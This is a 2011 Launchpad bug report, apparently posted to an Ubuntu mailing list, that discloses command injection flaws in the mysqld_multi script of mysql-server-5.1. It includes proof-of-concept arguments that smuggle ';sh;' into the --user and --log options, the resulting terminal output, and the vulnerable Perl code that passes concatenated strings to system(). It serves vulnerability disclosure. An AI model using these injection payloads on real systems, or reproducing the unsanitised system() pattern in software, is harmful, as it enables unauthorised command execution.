[Bug 782298] [NEW] command injections in mysqld_multi
Emanuel Bronshtein
782298 at bugs.launchpad.net
Fri May 13 16:55:03 UTC 2011
Public bug reported:
Binary package hint: mysql-server-5.1
/usr/bin/mysqld_multi have command injection bugs .
test case :
emanuel at emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --example --silent > /tmp/mysqld_multi_example
1 ) report option :
emanuel at emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --user="User ping;sh;" report --silent
mysqld_multi log file version 2.16; run: Fri May 13 19:41:26 2011
Reporting MySQL servers
/usr/bin/mysqladmin: connect to server at 'localhost' failed
error: 'Access denied for user 'User'@'localhost' (using password: NO)'
$
2 ) start option :
emanuel at emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --log="/tmp/mlog;echo SystemInj;sh;echo 1" start
SystemInj
$
3 ) stop option
emanuel at emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --user="User ping;sh;" stop --silent
mysqld_multi log file version 2.16; run: Fri May 13 19:42:59 2011
Stopping MySQL servers
/usr/bin/mysqladmin: connect to server at 'localhost' failed
error: 'Access denied for user 'User'@'localhost' (using password: NO)'
$
the bug can be found at :
1 ) sub report_mysqlds
$com= get_mysqladmin_options($i, @groups);
$com.= " ping >> /dev/null 2>&1";
system($com);
2 ) sub start_mysqlds()
$com.= $tmp;
$com.= " >> $opt_log 2>&1" if (!$opt_no_log);
$com.= " &";
system($com);
3 ) sub stop_mysqlds()
$com= get_mysqladmin_options($i, @groups);
$com.= " shutdown";
$com.= " >> $opt_log 2>&1" if (!$opt_no_log);
$com.= " &";
system($com);
** Affects: mysql-5.1 (Ubuntu)
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Ubuntu
Server Team, which is subscribed to mysql-5.1 in Ubuntu.
https://bugs.launchpad.net/bugs/782298
Title:
command injections in mysqld_multi
More information about the Ubuntu-server-bugs
mailing list